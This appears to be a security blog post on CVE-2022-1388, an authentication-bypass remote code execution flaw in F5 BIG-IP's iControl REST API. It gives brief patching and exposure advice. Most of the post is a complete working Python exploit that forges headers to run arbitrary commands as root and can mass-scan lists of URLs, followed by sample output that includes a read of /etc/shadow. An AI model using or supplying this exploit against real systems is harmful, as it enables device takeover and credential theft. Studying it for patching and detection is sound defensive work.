A proof of concept (PoC) was developed for a critical vulnerability in F5's BIG-IP networking software that could expose thousands of users to remote control.
The vulnerability, tracked as CVE-2022-1388, could allow an attacker to make undisclosed requests to bypass iControl's REST authentication.
If exploited, an unauthenticated user could get remote code execution (RCE) on an affected device. 👽
Affected Devices
Everything older than version 17. Patches are available for BIG-IP versions 13-16. BIG-IP version 11 and 12 are vulnerable with no available patch.
So what should you do?
Usually, I recommend patching first and later attending to the configuration issues. But in this case, I will swap this order: First, make sure you are not exposing the admin interface. If you can't manage that: Don't try patching. Turn off the device instead. If the configuration interface is safe: Patch!
▓ CVE-2022-1388.py:
import os
import sys
import argparse
import urllib3
import requests
urllib3.disable_warnings()
headers = {
"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
"Content-type": "application/json",
"Connection": "close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
"X-F5-Auth-Token": "anything",
"Authorization": "Basic YWRtaW46"}
endpoint = "/mgmt/tm/util/bash"
def usage():
print("Eg: \n python3 CVE-2022-1388.py -u https://127.0.0.1")
print(" python3 CVE-2022-1388.py -u httts://127.0.0.1 -c 'cat /etc/passwd'")
print(" python3 CVE-2022-1388.py -f urls.txt")
def poc(url):
payload = {"command": "run", "utilCmdArgs": "-c id"}
try:
res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
if (res.status_code == 200) and ('uid=0(root) gid=0(root) groups=0(root)' in res.text):
print("[+] {} is vulnerable!!!".format(url))
return True
else:
print("[-] {} is not vulnerable.".format(url))
return False
except Exception as e:
print("[-] {} Exception: ".format(url) + e)
pass
def exp(url, command):
payload = {"command": "run", "utilCmdArgs": "-c '{}'".format(command)}
try:
res = requests.post(url+endpoint, headers=headers, json=payload, proxies=None, timeout=15, verify=False)
if (res.status_code == 200) and ("tm:util:bash:runstate" in res.text):
print(res.json()['commandResult'])
return True
else:
print("[-] {} is not vulnerable.".format(url))
return False
except Exception as e:
print("[-] {} Exception: ".format(url) + e)
pass
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE")
parser.add_argument('-u', '--url', type=str,
help="vulnerability verification for individual websites")
parser.add_argument('-c', '--command', type=str,
help="command execution")
parser.add_argument('-f', '--file', type=str,
help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
args = parser.parse_args()
if len(sys.argv) == 3:
if sys.argv[1] in ['-u', '--url']:
poc(args.url)
elif sys.argv[1] in ['-f', '--file']:
if os.path.isfile(args.file) == True:
with open(args.file) as target:
urls = []
urls = target.read().splitlines()
for url in urls:
if poc(url) == True:
with open("success.txt", "a+") as f:
f.write(url + "\n")
elif len(sys.argv) == 5:
if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-c', '--command']):
exp(args.url, args.command)
else:
parser.print_help()
usage()
▓ Outputs:
root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address>
[+] https://<ip-address> is vulnerable!!!
root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'id'
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'cat /etc/shadow'
...
root:$6$TMuNP0xxxxxxxx
admin:$6$83fzG1vk$7wpUV.vkxxxxxx
...
⇡ sha512—Produces a 512-bit digest. The encrypted password starts with $6$.
root@DRM:/tmp# python3 CVE-2022-1388.py -u https://<ip-address> -c 'tmsh show sys hardware'
Sys::Hardware
Chassis Information
Maximum MAC Count 1
Registration Key -
Hardware Version Information
Name cpus
Type base-board
Model Intel Xeon Processor (Skylake, IBRS)
Parameters -- --
cache size 4096 KB
cores 24 (physical:24)
cpu MHz 2194.838
cpu sockets 24
cpu stepping 4
Platform
Name BIG-IP Virtual Edition
BIOS Revision
Base MAC 52:54:00:xx:55:ba
Hypervisor KVM
Cloud
System Information
Type Z100
Chassis Serial 191931f7-0dcb-4d7c-45xe
Level 200/400 Part
Switchboard Serial
Switchboard Part Revision
Host Board Serial
Host Board Part Revision
Comments